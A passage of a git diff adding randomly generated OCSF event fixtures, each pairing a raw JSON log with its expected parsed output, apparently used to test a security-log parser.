\"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}" + }, + "expected": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}", + "event": { + "action": "unknown", + "category": [], + "code": "digit", + "provider": "arg handed dock", + "reason": "sellers besides hl", + "severity": 1, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:28.061000Z", + "file": { + "hash": { + "md5": "89759E1284E2479B991D2669DE104942", + "ssdeep": "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + }, + "inode": "28d43742-a02f-11ef-9ec1-0242ac110007", + "name": "propose.pptx", + "type": "Folder" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Process Remediation Activity", + "class_uid": 7003 + }, + "process": { + "command_line": "characters vocal tracy", + "entity_id": "28d4de90-a02f-11ef-98b9-0242ac110007", + "name": "Prince", + "parent": { + "command_line": "commission relying steady", + "entity_id": "28d53f16-a02f-11ef-9a1e-0242ac110007", + "pid": 40, + "start": "2024-11-11T13:16:28.074000Z", + "thread": { + "id": 51 + }, + "user": { + "id": [ + "28d53156-a02f-11ef-aa73-0242ac110007" + ] + } + }, + "pid": 7, + "start": "2024-11-11T13:16:28.072000Z", + "thread": { + "id": 47 + }, + "user": { + "id": [ + "28d4888c-a02f-11ef-82fc-0242ac110007" + ], + "name": "Pork" + } + }, + "related": { + "hash": [ + "89759E1284E2479B991D2669DE104942", + "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_windows_service_1.json b/OCSF/ocsf/tests/generated_windows_service_1.json new file mode 100644 index 000000000..c474de045 --- /dev/null +++ b/OCSF/ocsf/tests/generated_windows_service_1.json @@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": 